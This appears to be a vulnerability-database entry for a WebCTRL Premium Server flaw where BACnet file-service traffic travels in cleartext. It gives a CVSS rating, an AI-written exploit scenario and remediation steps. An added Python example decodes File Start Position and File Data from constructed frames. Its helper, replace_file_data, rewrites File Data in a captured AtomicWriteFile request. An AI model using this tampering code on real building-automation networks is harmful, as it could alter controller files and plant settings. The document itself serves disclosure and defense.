Severity by source
CVSS 3.1 (NVD, the only source rating this CVE): CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N, base score 9.1 (Critical)
Description (CVE.org)
Service information is not encrypted when transmitted as BACnet packets over the wire, and can be sniffed, intercepted, and modified by an attacker. Valuable information such as the File Start Position and File Data can be sniffed from network traffic using Wireshark's BACnet dissector filter. The proprietary format used by WebCTRL to receive updates from the PLC can also be sniffed and reverse engineered.
Analysis (AI)
This vulnerability affects Automated Logic's WebCTRL Premium Server, which transmits BACnet protocol data in cleartext without encryption. An attacker positioned on the network can sniff sensitive service information including File Start Position, File Data, and proprietary PLC update formats using tools like Wireshark, enabling both information disclosure and potential integrity attacks through modification of intercepted traffic. …
Vulnerability Assessment (AI)

| Aspect | Assessment |
|---|---|
| Exploitation | Remote and unauthenticated, but not from anywhere: the attacker needs a vantage point from which BACnet traffic can be observed or relayed (a tap, a mirrored switch port or a compromised host on the building-management segment). The BACnet/IP traffic carries these services with no encryption and no integrity protection, so nothing else stands in the way. … |
| Risk Assessment | The CVSS 3.1 vector (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N, base score 9.1) describes a network-exploitable weakness with low attack complexity, no privileges required and high impact to confidentiality and integrity; availability is not affected. … |
| Exploit Scenario | An attacker who gains access to the building management network (through physical access to network infrastructure, compromised credentials on an adjacent system, or lateral movement from another segment) places a packet capture tool on a network tap or compromised switch port. Using Wireshark with BACnet dissector filters, the attacker passively captures file transfer operations between WebCTRL Premium Server and connected PLCs, extracting configuration data, operational parameters and the proprietary update format. Because the traffic is also unauthenticated, an on-path attacker can modify it in transit. … |
| Remediation | Consult the CISA ICS advisory at https://www.cisa.gov/news-events/ics-advisories/icsa-26-078-08 and Automated Logic's security commitment page at https://www.automatedlogic.com/en/company/security-commitment/ for patch availability and upgrade instructions. … |
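The passive capture that the description and the exploit scenario above describe, as an added example (this is not code from the page, from Automated Logic or from WebCTRL): a small decoder for the two BACnet file-service PDUs that carry File Data (AtomicWriteFile-Request and AtomicReadFile-ACK), run over constructed BACnet/IP frames, plus a tampering helper that shows why integrity is rated High as well as confidentiality. The frame contents, invoke IDs, file instance and payload strings are invented for the example; the BVLC, NPDU, APDU and tag layouts follow ASHRAE 135, and only stream access is handled.

```python
"""Added example: decode BACnet/IP file-service PDUs and show that File Start Position and File Data are cleartext."""
import struct
from dataclasses import dataclass
from typing import Optional

class BACnetDecodeError(ValueError): pass

@dataclass
class FileTransfer:
    service: str                    # "AtomicWriteFile" (request) or "AtomicReadFile" (ack)
    invoke_id: int
    file_instance: Optional[int]    # File object instance; requests only
    start_position: int             # File Start Position, cleartext on the wire
    data: bytes                     # File Data, cleartext on the wire
    end_of_file: Optional[bool]     # AtomicReadFile-ACK only

def _tag(buf, pos):
    """One tag (ASHRAE 135 20.2) -> (number, is_context, lvt, pos); lvt = length, or "open"/"close"."""
    octet, pos = buf[pos], pos + 1
    number, is_context, lvt = octet >> 4, bool(octet & 0x08), octet & 0x07
    if number == 0x0F:                          # extended tag number in the next octet
        number, pos = buf[pos], pos + 1
    if is_context and lvt in (6, 7):
        return number, True, "open" if lvt == 6 else "close", pos
    if lvt == 5:                                # extended length: 1, 2 or 4 more octets
        ext, pos = buf[pos], pos + 1
        size = {254: 2, 255: 4}.get(ext, 0)
        lvt, pos = (int.from_bytes(buf[pos:pos + size], "big") if size else ext), pos + size
    return number, is_context, lvt, pos

def _app(buf, pos, expect):
    """Application-tagged primitive of tag `expect` -> (lvt, content, pos)."""
    number, is_context, lvt, pos = _tag(buf, pos)
    if is_context or number != expect:
        raise BACnetDecodeError(f"expected application tag {expect}, got {number}")
    if expect == 1:                             # BOOLEAN keeps its value in lvt, no content octets
        return lvt, b"", pos
    if pos + lvt > len(buf):
        raise BACnetDecodeError("truncated value")
    return lvt, bytes(buf[pos:pos + lvt]), pos + lvt

def parse_bacnet_ip(frame: bytes) -> FileTransfer:
    """BVLC -> NPDU -> APDU -> file-service parameters, for one unsegmented frame."""
    if len(frame) < 6 or frame[0] != 0x81 or frame[1] not in (0x0A, 0x0B):
        raise BACnetDecodeError("not an Original-Unicast/Broadcast-NPDU BACnet/IP frame")
    if struct.unpack_from(">H", frame, 2)[0] != len(frame):
        raise BACnetDecodeError("BVLC length does not match frame length")
    control, pos = frame[5], 6
    if frame[4] != 0x01 or control & 0x80:
        raise BACnetDecodeError("not an NPDU carrying an APDU")
    for present in (control & 0x20, control & 0x08):   # DNET/DLEN/DADR, then SNET/SLEN/SADR
        if present:
            pos += 3 + frame[pos + 2]
    pos += 1 if control & 0x20 else 0                  # hop count follows the SNET block
    header = frame[pos]
    if header & 0x08:
        raise BACnetDecodeError("segmented APDU not handled")
    if header >> 4 == 0 and frame[pos + 3] == 7:       # Confirmed-Request: hdr, max-APDU, invoke, service
        invoke_id, pos, service = frame[pos + 2], pos + 4, "AtomicWriteFile"
        _, raw, pos = _app(frame, pos, 12)             # fileIdentifier = object type << 22 | instance
        instance, end_of_file = struct.unpack(">I", raw)[0] & 0x3FFFFF, None
    elif header >> 4 == 3 and frame[pos + 2] == 6:     # Complex-ACK: hdr, invoke, service
        invoke_id, pos, service = frame[pos + 1], pos + 3, "AtomicReadFile"
        eof, _, pos = _app(frame, pos, 1)              # endOfFile BOOLEAN
        instance, end_of_file = None, bool(eof)
    else:
        raise BACnetDecodeError("not an AtomicWriteFile-Request or AtomicReadFile-ACK")
    number, is_context, lvt, pos = _tag(frame, pos)
    if not (is_context and lvt == "open" and number == 0):
        raise BACnetDecodeError("only streamAccess [0] is handled")
    _, raw, pos = _app(frame, pos, 3)                  # fileStartPosition INTEGER, two's complement
    start = int.from_bytes(raw, "big", signed=True)
    _, data, pos = _app(frame, pos, 6)                 # fileData OCTET STRING
    if _tag(frame, pos)[2] != "close":
        raise BACnetDecodeError("missing closing tag")
    return FileTransfer(service, invoke_id, instance, start, data, end_of_file)

def _octet_string(b):               # application tag 6 encoder, short or extended length form
    if len(b) < 5:
        return bytes([0x60 | len(b)]) + b
    return (bytes([0x65, len(b)]) if len(b) < 254 else b"\x65\xfe" + struct.pack(">H", len(b))) + b

def _frame(npdu_control, apdu):     # two-octet NPDU plus Original-Unicast-NPDU BVLC header
    npdu = bytes([0x01, npdu_control])
    return bytes([0x81, 0x0A]) + struct.pack(">H", 4 + len(npdu) + len(apdu)) + npdu + apdu

FILE_1 = bytes([0xC4, 0x02, 0x80, 0x00, 0x01])   # object-identifier: type 10 (File), instance 1
# Constructed AtomicWriteFile request (invoke 42): stream access, offset 0, 16 octets of data.
WRITE_REQUEST = _frame(0x04, bytes([0x00, 0x05, 42, 7]) + FILE_1 + b"\x0e\x31\x00"
                       + _octet_string(b"BACnet cleartext") + b"\x0f")
# Constructed AtomicReadFile-ACK (invoke 43): endOfFile TRUE (0x11), offset 1024, data in the clear.
READ_ACK = _frame(0x00, bytes([0x30, 43, 6]) + b"\x11\x0e\x32\x04\x00"
                  + _octet_string(b"set=72F;mode=occupied") + b"\x0f")

def replace_file_data(frame: bytes, new_data: bytes) -> bytes:
    """On-path tampering with a captured AtomicWriteFile request: nothing in the frame
    authenticates it, so swapping File Data only means fixing the two length fields."""
    t = parse_bacnet_ip(frame)
    if t.service != "AtomicWriteFile":
        raise BACnetDecodeError("only AtomicWriteFile requests carry writable File Data")
    body = frame[4:].replace(_octet_string(t.data), _octet_string(new_data), 1)
    return frame[:2] + struct.pack(">H", 4 + len(body)) + body
```

In a live capture these are the same fields Wireshark's bacapp dissector displays; a display filter such as `bacapp.confirmed_service == 7` isolates AtomicWriteFile traffic. `replace_file_data` finds the old payload by byte match, which is enough for the demonstration; a real tool would use the offsets the parser walked. The point of the helper is that the parser accepts the modified frame exactly as it accepts the original, because nothing in classic BACnet/IP binds the payload to its sender.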
Recommended Action (AI)
Within 24 hours: Inventory all WebCTRL Premium Server instances and document network connectivity; restrict network access to these systems using firewall rules to trusted administrative networks only. …
EUVD identifier: EUVD-2026-13840